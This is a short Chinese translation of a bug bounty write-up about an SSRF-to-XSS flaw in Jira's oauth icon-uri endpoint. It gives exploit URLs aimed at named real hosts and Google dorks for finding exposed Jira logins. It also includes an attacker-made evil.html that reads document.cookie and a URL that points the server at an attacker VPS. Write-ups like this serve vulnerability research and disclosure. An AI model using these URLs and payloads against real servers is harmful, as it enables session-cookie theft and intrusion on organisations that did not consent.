漏洞:SSRF + XSS
作者:Yeasir Arafat
难度:低
我正在测试一个名为visma的公共BUG赏金计划,像往常一样,我先收集了它的一些子域名。很少有子域能引起我的关注,但是下面列出的运行jira服务的子域成功吸引了我的注意
1
| https://jira.brown.edu/plugins/servlet/oauth/users/icon-uri?consumerUri=http://www.baidu.com
|
如果你想找一些运行jira服务的子域练练手,可以试试使用下面的谷歌语法
1 2
| inurl:visma intitle:JIRA login inurl:companyname intitle:JIRA login
|
1
| https://customer-incident.consulting.visma.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com
|
我尝试获取一些网站内部数据或获取读取权限,但是我失败了。 如果你想用脚本自动测试网站是否存在jira漏洞,我建议你使用Github上的exp工具Jira-Scan
[*]攻击者创建的evil.html
1 2 3 4 5 6 7 8 9 10 11
| <html> <head> <title>SSRF to XSS on Jira Vulnerable Instances</title> </head> <body> <script> alert( document.domain + " is vulnerable" ); alert( document.cookie); </script> </body> </html>
|
现在访问我们自己在VPS上搭建的XSS漏洞网页,验证能否触发XSS并获取Cookie
1
| https://customer-incident.consulting.visma.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://VPSIP/evil.html
|
打赏译者